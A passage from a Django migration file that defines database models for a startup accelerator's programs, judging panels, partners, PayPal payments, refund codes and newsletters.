('url_slug', models.CharField(blank=True, default='', max_length=64, unique=True, validators=[django.core.validators.RegexValidator(message='Letters, numbers, and dashes only.', regex='^[\\w-]+$')])),
],
options={
'verbose_name_plural': 'Organizations',
'db_table': 'accelerator_organization',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ORGANIZATION_MODEL',
},
),
migrations.CreateModel(
name='Panel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.CharField(blank=True, max_length=30)),
('status', models.CharField(choices=[('NOT STARTED', 'NOT STARTED'), ('PREVIEW', 'PREVIEW'), ('ACTIVE', 'ACTIVE'), ('COMPLETED', 'COMPLETED')], default='NOT STARTED', max_length=30)),
('applications', models.ManyToManyField(related_name='panels', through='accelerator.ApplicationPanelAssignment', to=settings.ACCELERATOR_APPLICATION_MODEL)),
('judges', models.ManyToManyField(related_name='panels', through='accelerator.JudgePanelAssignment', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Panels',
'db_table': 'accelerator_panel',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANEL_MODEL',
},
),
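        # PanelLocation and PanelType (below) use a CharField natural primary
        # key instead of the usual AutoField 'id'. Their Meta.ordering refers
        # to a 'judging_round' field not declared in this excerpt; it is
        # presumably added by a later AddField operation in this migration.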
migrations.CreateModel(
name='PanelLocation',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('location', models.CharField(max_length=225, primary_key=True, serialize=False)),
('description', models.CharField(max_length=225)),
],
options={
'verbose_name_plural': 'Panel Locations',
'db_table': 'accelerator_panellocation',
'ordering': ['judging_round', 'description'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELLOCATION_MODEL',
},
),
migrations.CreateModel(
name='PanelTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('day', models.CharField(max_length=255)),
('time', models.CharField(max_length=255)),
('start_date_time', models.DateTimeField(null=True)),
('end_date_time', models.DateTimeField(null=True)),
],
options={
'verbose_name_plural': 'Panel Times',
'db_table': 'accelerator_paneltime',
'ordering': ['judging_round', 'start_date_time'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELTIME_MODEL',
},
),
migrations.CreateModel(
name='PanelType',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('panel_type', models.CharField(max_length=225, primary_key=True, serialize=False)),
('description', models.CharField(max_length=225)),
],
options={
'verbose_name_plural': 'Panel Types',
'db_table': 'accelerator_paneltype',
'ordering': ['judging_round', 'description'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PANELTYPE_MODEL',
},
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.TextField(blank=True, help_text='This is the generic description of the Partner, shared across all Programs.', max_length=1000)),
('partner_logo', sorl.thumbnail.fields.ImageField(blank=True, upload_to='startup_pics', verbose_name='Partner Logo')),
('organization', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_ORGANIZATION_MODEL)),
],
options={
'verbose_name_plural': 'Partners',
'db_table': 'accelerator_partner',
'ordering': ['organization__name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PARTNER_MODEL',
},
),
migrations.CreateModel(
name='PartnerTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('partner_administrator', models.BooleanField(default=False)),
('partner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
('team_member', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Partner Team Members',
'db_table': 'accelerator_partnerteammember',
'ordering': ['team_member__last_name', 'team_member__first_name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PARTNERTEAMMEMBER_MODEL',
},
),
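        # The Decimal('0.00') defaults on the payment models below assume
        # `from decimal import Decimal` in the migration header (outside this
        # excerpt), alongside the settings and third-party field imports.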
migrations.CreateModel(
name='PayPalPayment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('token', models.CharField(max_length=100)),
('transaction', models.CharField(blank=True, max_length=100)),
('amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('currency_code', models.CharField(default='', max_length=3)),
('refundable', models.BooleanField(default=True)),
],
options={
'db_table': 'accelerator_paypalpayment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PAYPALPAYMENT_MODEL',
},
),
migrations.CreateModel(
name='PayPalRefund',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('status', models.CharField(blank=True, max_length=100)),
('transaction', models.CharField(blank=True, max_length=100)),
('correlation', models.CharField(blank=True, max_length=100)),
('amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PAYPALPAYMENT_MODEL)),
],
options={
'db_table': 'accelerator_paypalrefund',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PAYPALREFUND_MODEL',
},
),
migrations.CreateModel(
name='Program',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
('start_date', models.DateTimeField(blank=True, null=True)),
('end_date', models.DateTimeField(blank=True, null=True)),
('location', models.CharField(max_length=50)),
('program_status', models.CharField(choices=[('upcoming', 'Upcoming'), ('active', 'Active'), ('ended', 'Ended'), ('hidden', 'Hidden')], max_length=64)),
                ('alumni_eligible_program', models.BooleanField(default=False, help_text='Finalists will be added to our Global Alumni Program when this program is set to "Ended"')),
('currency_code', models.CharField(max_length=3)),
('early_application_fee', models.DecimalField(decimal_places=2, max_digits=7)),
('regular_application_fee', models.DecimalField(decimal_places=2, max_digits=7)),
('regular_fee_suffix', models.CharField(blank=True, max_length=20)),
('interested_judge_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_judge_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_mentor_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_mentor_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_speaker_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_speaker_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('interested_office_hours_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('approved_office_hours_message', models.TextField(blank=True, help_text='You may use HTML, including links')),
('refund_code_support', models.CharField(choices=[('enabled', 'Enabled'), ('view-submitted-only', 'View Submitted Only'), ('disabled', 'Disabled')], default='enabled', max_length=64)),
('many_codes_per_partner', models.BooleanField(default=False, help_text='If true, then a given application may apply more than one refund code from the same partner for this program', verbose_name='Allow multiple refund codes per partner')),
('url_slug', models.CharField(default='', max_length=30)),
('accepting_mentors_and_goals', models.BooleanField(default=False)),
('overview_start_date', models.DateTimeField(blank=True, help_text='Time is in UTC', null=True)),
('overview_deadline_date', models.DateTimeField(blank=True, help_text='Time is in UTC', null=True)),
('eventbrite_organizer_id', models.CharField(blank=True, max_length=20, null=True)),
('program_overview_link', models.URLField(blank=True, help_text='URL of the program overview page, ex: https://masschallenge.org/programs-boston', max_length=255, null=True)),
],
options={
'verbose_name_plural': 'Programs',
'db_table': 'accelerator_program',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAM_MODEL',
},
),
migrations.CreateModel(
name='ProgramCycle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128)),
('short_name', models.CharField(blank=True, max_length=32, null=True)),
('applications_open', models.BooleanField(default=False)),
('application_open_date', models.DateTimeField(blank=True, null=True)),
('application_early_deadline_date', models.DateTimeField(blank=True, null=True)),
('application_final_deadline_date', models.DateTimeField(blank=True, null=True)),
('advertised_final_deadline', models.DateTimeField(blank=True, null=True)),
('accepting_references', models.BooleanField(default=False)),
('hidden', models.BooleanField(default=False)),
('default_application_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='application_type_for', to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL)),
('default_overview_application_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='default_overview_application_type_for', to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL)),
],
options={
'verbose_name_plural': 'program cycles',
'db_table': 'accelerator_programcycle',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMCYCLE_MODEL',
},
),
migrations.CreateModel(
name='ProgramFamily',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=128)),
('short_description', models.TextField(blank=True, help_text='You may use HTML, including links')),
('url_slug', models.CharField(default='', max_length=30)),
('email_domain', models.CharField(default='', help_text='Base domain for role-based email', max_length=30)),
('phone_number', models.CharField(default='', help_text='Phone number for this program (local form)', max_length=30)),
('physical_address', models.TextField(default='')),
('office_hour_bcc', models.EmailField(blank=True, help_text='An email address to bcc whenever office hours are created, deleted, or modified in this program family', max_length=100, null=True)),
('is_open_for_startups', models.BooleanField(default=False, help_text='Whether this ProgramFamily should be available to entrepreneurs')),
('is_open_for_experts', models.BooleanField(default=False, help_text='Whether this ProgramFamily should be available to experts')),
('use_site_tree_side_nav', models.BooleanField(default=False, help_text='Show the new-style side navigation')),
('timezone', models.CharField(default='UTC', help_text='Timezone name from Olson Timezone database (https://en.wikipedia.org/wiki/Tz_database)', max_length=35)),
],
options={
'verbose_name_plural': 'program families',
'db_table': 'accelerator_programfamily',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMFAMILY_MODEL',
},
),
migrations.CreateModel(
name='ProgramFamilyLocation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('primary', models.BooleanField()),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_LOCATION_MODEL)),
('program_family', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL)),
],
options={
'verbose_name': 'Program Family Location',
'verbose_name_plural': 'Program Family Locations',
'db_table': 'accelerator_programfamilylocation',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMFAMILYLOCATION_MODEL',
},
),
migrations.CreateModel(
name='ProgramOverride',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('applications_open', models.BooleanField(default=False)),
('application_open_date', models.DateTimeField(blank=True, null=True)),
('application_early_deadline_date', models.DateTimeField(blank=True, null=True)),
('application_final_deadline_date', models.DateTimeField(blank=True, null=True)),
('early_application_fee', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('regular_application_fee', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('cycle', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='program_overrides', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Overrides',
'db_table': 'accelerator_programoverride',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMOVERRIDE_MODEL',
},
),
migrations.CreateModel(
name='ProgramPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('description', models.TextField(blank=True, help_text='This is the description of the Partner SPECIFICALLY IN THE CONTEXT OF THE PROGRAM. (Distinct from the generic description of the Partner.) For example, description of In-Kind sponsorship deals specific to a Program would go here.', max_length=2000)),
('partner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
],
options={
'verbose_name_plural': 'Program Partner',
'db_table': 'accelerator_programpartner',
'ordering': ['program__name', 'partner_type__sort_order', 'partner'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMPARTNER_MODEL',
},
),
migrations.CreateModel(
name='ProgramPartnerType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('partner_type', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=200)),
('feature_in_footer', models.BooleanField(default=False)),
('sort_order', models.IntegerField(blank=True, null=True)),
('badge_image', sorl.thumbnail.fields.ImageField(blank=True, upload_to='badge_images')),
('badge_display', models.CharField(choices=[('NONE', 'None'), ('PARTNER_LIST', 'Only on partner list'), ('PARTNER_PROFILE', 'Only on partner profile'), ('PARTNER_LIST_AND_PROFILE', 'Partner list and profile')], default='NONE', max_length=30)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Partner Types',
'db_table': 'accelerator_programpartnertype',
'ordering': ['program', 'sort_order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMPARTNERTYPE_MODEL',
},
),
migrations.CreateModel(
name='ProgramRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(db_index=True, max_length=255, unique=True)),
('landing_page', models.CharField(blank=True, max_length=255, null=True)),
('newsletter_recipient', models.BooleanField(default=False)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name': 'Program Role',
'verbose_name_plural': 'Program Roles',
'db_table': 'accelerator_programrole',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMROLE_MODEL',
},
),
migrations.CreateModel(
name='ProgramRoleGrant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('program_role', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL)),
],
options={
'verbose_name': 'Program Role Grant',
'verbose_name_plural': 'Program Role Grants',
'db_table': 'accelerator_programrolegrant',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMROLEGRANT_MODEL',
},
),
migrations.CreateModel(
name='ProgramStartupAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('attribute_type', models.CharField(choices=[('django.forms.CharField', 'Text Line'), ('django.forms.IntegerField', 'Integer'), ('django.forms.FloatField', 'Floating Point Value'), ('django.forms.BooleanField', 'True/False')], help_text='Select the type of information for this attribute', max_length=63, verbose_name='Type')),
('attribute_label', models.CharField(help_text='Provide a human-readable label for this attribute. It must be unique for the selected Program', max_length=127, verbose_name='Label')),
('attribute_description', models.CharField(blank=True, help_text='Provide "help text" for this attribute', max_length=255, verbose_name='Description')),
('admin_viewable', models.BooleanField(default=False, help_text='Can Startup Administrators view this attribute for their own Startups?')),
                ('non_admin_viewable', models.BooleanField(default=False, help_text='Can non-administrator team members view this attribute for their own Startups?')),
('staff_viewable', models.BooleanField(default=False, help_text='Can MC Staff view this attribute?')),
('finalist_viewable', models.BooleanField(default=False, help_text='Can Other Finalists view this attribute?')),
('mentor_viewable', models.BooleanField(default=False, help_text='Can Mentors view this attribute?')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'db_table': 'accelerator_programstartupattribute',
'ordering': ['program', 'attribute_label'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMSTARTUPATTRIBUTE_MODEL',
},
),
migrations.CreateModel(
name='ProgramStartupStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('startup_status', models.CharField(max_length=255, unique=True)),
('description', models.TextField(blank=True, null=True)),
('startup_list_include', models.BooleanField(default=False, help_text='Include this startup status as a tab in the public startup list')),
('startup_list_tab_title', models.CharField(max_length=50, null=True)),
('startup_list_tab_description', models.TextField(blank=True, help_text='You may use HTML, including links', max_length=1000)),
('startup_list_tab_id', models.CharField(help_text='The slug used in the public URL', max_length=30, null=True)),
('startup_list_tab_order', models.IntegerField(null=True)),
('include_stealth_startup_names', models.BooleanField(default=False)),
('badge_image', sorl.thumbnail.fields.ImageField(blank=True, upload_to='badge_images')),
('badge_display', models.CharField(choices=[('NONE', 'None'), ('STARTUP_LIST', 'Only on startup list'), ('STARTUP_PROFILE', 'Only on startup profile'), ('STARTUP_LIST_AND_PROFILE', 'Startup list and profile')], default='NONE', max_length=30)),
('status_group', models.CharField(blank=True, help_text='Only one status is shown from the same status group; which one is determined by sort order', max_length=50, null=True)),
('sort_order', models.IntegerField(blank=True, help_text='Order', null=True)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Startup Statuses',
'db_table': 'accelerator_programstartupstatus',
'ordering': ['program', 'sort_order', 'startup_status'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMSTARTUPSTATUS_MODEL',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=200)),
('question_type', models.CharField(choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=4000)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
],
options={
'db_table': 'accelerator_question',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_QUESTION_MODEL',
},
),
migrations.CreateModel(
name='Reference',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('email', models.CharField(max_length=100, validators=[django.core.validators.EmailValidator()], verbose_name='Email address')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('title', models.CharField(max_length=50)),
('company', models.CharField(max_length=50)),
('reference_hash', models.CharField(max_length=50, unique=True)),
('sent', models.DateTimeField(blank=True, null=True)),
('accessed', models.DateTimeField(blank=True, null=True)),
('submitted', models.DateTimeField(blank=True, null=True)),
('confirmed_first_name', models.CharField(blank=True, max_length=50)),
('confirmed_last_name', models.CharField(blank=True, max_length=50)),
('confirmed_company', models.CharField(blank=True, max_length=50)),
('question_1_rating', models.IntegerField(null=True)),
('question_2_rating', models.IntegerField(null=True)),
('comments', models.TextField(blank=True)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
('requesting_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFERENCE_MODEL',
},
),
migrations.CreateModel(
name='RefundCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('unique_code', models.CharField(max_length=100, unique=True)),
('discount', models.IntegerField(default=0)),
('maximum_uses', models.PositiveIntegerField(blank=True, default=1, help_text='Indicate the maximum number of valid redemptions for this code. A null value is interpreted as unlimited.', null=True, verbose_name='Maximum Uses')),
('notes', models.CharField(blank=True, max_length=300)),
                ('internal', models.BooleanField(default=False, help_text='If set then this code is intended for internal use (e.g., Early Bird discount) and cannot be entered directly by users.')),
('issued_to', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
('programs', models.ManyToManyField(blank=True, help_text='Which programs is this refund code valid for? If no programs are given, then this code can be applied to any program.', related_name='refund_codes', to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Refund Codes',
'db_table': 'accelerator_refundcode',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFUNDCODE_MODEL',
},
),
migrations.CreateModel(
name='RefundCodeRedemption',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('refund_status', models.CharField(blank=True, choices=[('not_eligible', 'Not Eligible For Refund'), ('required', 'Refund Due'), ('instant', 'Refund Issued'), ('delayed', 'Refund Pending'), ('failed', 'Refund Failed')], max_length=32)),
('refund_transaction_id', models.CharField(blank=True, max_length=500)),
('refund_amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('cycle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
('refund_code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='redemptions', to=settings.ACCELERATOR_REFUNDCODE_MODEL)),
],
options={
'db_table': 'accelerator_refundcoderedemption',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFUNDCODEREDEMPTION_MODEL',
},
),
migrations.CreateModel(
name='Scenario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=40)),
('description', models.TextField(blank=True, max_length=512)),
('is_active', models.BooleanField(default=False)),
('panel_size', models.IntegerField(blank=True, default=10)),
('max_panels_per_judge', models.IntegerField(blank=True, null=True)),
('min_panels_per_judge', models.IntegerField(blank=True, default=0)),
('sequence_number', models.PositiveIntegerField(blank=True, help_text='Indicate the order for this scenario within the round', null=True)),
],
options={
'db_table': 'accelerator_scenario',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIO_MODEL',
},
),
migrations.CreateModel(
name='ScenarioApplication',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('priority', models.IntegerField(default=1)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'verbose_name_plural': 'Scenario Applications',
'db_table': 'accelerator_scenarioapplication',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOAPPLICATION_MODEL',
},
),
migrations.CreateModel(
name='ScenarioJudge',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'verbose_name_plural': 'Scenario Judges',
'db_table': 'accelerator_scenariojudge',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOJUDGE_MODEL',
},
),
migrations.CreateModel(
name='ScenarioPreference',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('priority', models.PositiveIntegerField()),
('constraint_type', models.CharField(choices=[('max', 'Maximum number of'), ('min', 'Minimum number of')], max_length=16)),
('entity_type', models.CharField(choices=[('JUDGE', 'judge'), ('APPLICATION', 'application')], max_length=16)),
('entity_set', models.CharField(choices=[('all', 'Judges Overall'), ('is_female', 'Judges that are Female'), ('is_lawyer', 'Judges that are Lawyers'), ('is_executive', 'Judges that are Executives'), ('is_investor', 'Judges that are Investors'), ('group_1', 'Judges in Group 1'), ('group_2', 'Judges in Group 2'), ('group_3', 'Judges in Group 3'), ('group_4', 'Judges in Group 4'), ('group_5', 'Judges in Group 5'), ('most_reliable', 'Judges that are the most reliable'), ('kinda_reliable', 'Judges that are kinda reliable'), ('not_reliable', 'Judges that are not reliable'), ('is_unassigned', 'Judges that were not assigned this round'), ('expert_in_industry', "Judges w/ expertise in the startup's primary industry"), ('also_knows_industry', "Judges w/ secondary expertise in the startup's primary industry"), ('in_program', 'Judges in program startup is applying to'), ('outside_program', 'Judges not in program startup is applying to')], max_length=32)),
('amount', models.PositiveIntegerField(blank=True, default=1, null=True)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'db_table': 'accelerator_scenariopreference',
'ordering': ['priority'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOPREFERENCE_MODEL',
},
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('heading', models.CharField(blank=True, max_length=255)),
('body', models.TextField(blank=True)),
('include_for', models.CharField(choices=[('EVERYONE', 'Everyone'), ('ANY_SPECIFIED_CATEGORY', 'Any specified category')], default='EVERYONE', max_length=32)),
                ('sequence', models.PositiveIntegerField(help_text='Specify the order of this section in the newsletter')),
('interest_categories', models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL)),
('newsletter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sections', to=settings.ACCELERATOR_NEWSLETTER_MODEL)),
],
options={
'db_table': 'accelerator_section',
'ordering': ('newsletter', 'sequence'),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SECTION_MODEL',
},
),
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50, unique=True)),
('security_key', models.CharField(max_length=100)),
('description', models.CharField(blank=True, max_length=500)),
('site_url', models.URLField(blank=True)),
],
options={
'db_table': 'accelerator_site',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITE_MODEL',
},
),
migrations.CreateModel(
name='SiteProgramAuthorization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('startup_profile_base_url', models.URLField()),
('sponsor_profile_base_url', models.URLField()),
('video_base_url', models.URLField()),
('startup_list', models.BooleanField(default=False)),
